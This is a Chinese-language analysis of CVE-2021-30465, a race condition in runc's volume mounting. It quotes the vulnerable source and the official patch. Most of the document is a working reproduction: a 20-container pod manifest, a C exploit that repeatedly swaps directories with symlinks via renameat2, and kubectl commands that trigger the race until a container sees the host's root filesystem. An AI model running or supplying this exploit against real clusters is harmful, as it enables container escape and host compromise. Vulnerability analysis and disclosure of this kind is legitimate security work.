漏洞分析
CVE-2021-30465是一个runc漏洞,利用这个漏洞可以通过条件竞争攻击来将宿主的目录挂载到容器中。
在容器中挂载volume之前,runc会先调用SecureJoin()来检查路径并拼接到容器的根目录下,如果路径是一个符号链接,则会替换成该符号链接指向的对应路径[1.1]。
case "tmpfs":
copyUp := m.Extensions&configs.EXT_COPYUP == configs.EXT_COPYUP
tmpDir := ""
// dest might be an absolute symlink, so it needs
// to be resolved under rootfs.
dest, err := securejoin.SecureJoin(rootfs, m.Destination)
if err != nil {
return err
}
m.Destination = dest
stat, err := os.Stat(dest)
if err != nil {
if err := os.MkdirAll(dest, 0755); err != nil {
return err
}
}
......
if copyUp {
if err := fileutils.CopyDirectory(dest, tmpDir); err != nil {
errMsg := fmt.Errorf("tmpcopyup: failed to copy %s to %s: %v", dest, tmpDir, err)
if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil {
return newSystemErrorWithCausef(err1, "tmpcopyup: %v: failed to unmount", errMsg)
}
return errMsg
}
if err := unix.Mount(tmpDir, dest, "", unix.MS_MOVE, ""); err != nil {
errMsg := fmt.Errorf("tmpcopyup: failed to move mount %s to %s: %v", tmpDir, dest, err)
if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil {
return newSystemErrorWithCausef(err1, "tmpcopyup: %v: failed to unmount", errMsg)
}
return errMsg
}
}
通过条件竞争的方式,可以在路径检查和挂载操作之间将正常路径替换为符号链接。在检查阶段,路径还不是符号链接,所以不会经过处理;而在检查之后、挂载之前,将路径替换为符号链接,这样这个符号链接指向的宿主系统的路径就会被挂载到容器中。
漏洞复现
系统:Ubuntu 20.04
Kubernetes:1.21.0
containerd:1.4.4
创建一个包含多个容器的pod,我这里包含了20个,配置文件内容如下:
apiVersion: v1
kind: Pod
metadata:
name: pod1
spec:
terminationGracePeriodSeconds: 1
containers:
- name: c1
image: ubuntu:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test2
- name: c2
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c3
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c4
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c5
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c6
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c7
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c8
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c9
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c10
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c11
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c12
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c13
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c14
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c15
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c16
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c17
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c18
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c19
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
- name: c20
image: abc.cba/aaa:latest
command: [ "/bin/sleep", "inf" ]
volumeMounts:
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt1
- name: test2
mountPath: /test1/mnt2
- name: test2
mountPath: /test1/mnt3
- name: test2
mountPath: /test1/mnt4
- name: test2
mountPath: /test1/zzz
volumes:
- name: test1
emptyDir:
medium: "Memory"
- name: test2
emptyDir:
medium: "Memory"
可以看到除了第一个容器以外,其他容器的镜像都是无效的,每个容器都挂载了一个test1卷和5个test2卷。
获取创建好的pod的UID:
sudo kubectl get pod pod1 -o yaml | grep uid
编写exp,其中的24a602eb-62e2-47dd-a083-9f44489582d6为刚刚获取的UID:
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/wait.h>
int main(int argc, char *argv[]) {
char *name_mnts[] = {"mnt1", "mnt2", "mnt3", "mnt4"};
char *name_tmps[] = {"mnt-tmp1", "mnt-tmp2", "mnt-tmp3", "mnt-tmp4"};
char *ld = "/var/lib/kubelet/pods/24a602eb-62e2-47dd-a083-9f44489582d6/volumes/kubernetes.io~empty-dir/";
int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
pid_t pid;
int i;
for (i=0; i<4; ++i)
{
pid = fork();
if (pid == 0)
break;
}
if (pid != 0)
wait(NULL);
else {
mkdir(name_mnts[i], 0755);
symlink(ld, name_tmps[i]);
while (1)
renameat2(dirfd, name_mnts[i], dirfd, name_tmps[i], RENAME_EXCHANGE);
}
return 0;
}
将编译好的exp文件放到c1容器中的/test1目录下,然后创建一个符号链接:
ln -s / /test2/test2
接着cd到/test1目录,运行exp。exp开始运行之后,回到宿主,更新其他容器的镜像使它们启动:
for c in {2..20}; do
sudo kubectl set image pod pod1 c$c=ubuntu:latest
done

列出每个容器的/test1/zzz目录下的内容:
for c in {2..20}; do
echo c$c
sudo kubectl exec -it pod/pod1 -c c$c -- ls /test1/zzz
done

在上面的输出结果中,可以看到c20成功获取到了宿主根目录的内容。
官方修复
在挂载之前,runc会先检查路径在/proc中对应的fd,确保fd指向的路径和挂载的路径一致,从而避免符号链接[3.1]。
fh, err := os.OpenFile(path, unix.O_PATH|unix.O_CLOEXEC, 0)
if err != nil {
return fmt.Errorf("open o_path procfd: %w", err)
}
defer fh.Close()
// Double-check the path is the one we expected.
procfd := "/proc/self/fd/" + strconv.Itoa(int(fh.Fd()))
if realpath, err := os.Readlink(procfd); err != nil {
return fmt.Errorf("procfd verification failed: %w", err)
} else if realpath != path {
return fmt.Errorf("possibly malicious path detected -- refusing to operate on %s", realpath)
}
参考
[1.1] https://github.com/opencontainers/runc/blob/v1.0.0-rc93/libcontainer/rootfs_linux.go#L340
[2.1] https://blog.champtar.fr/runc-symlink-CVE-2021-30465/
[3.1] https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f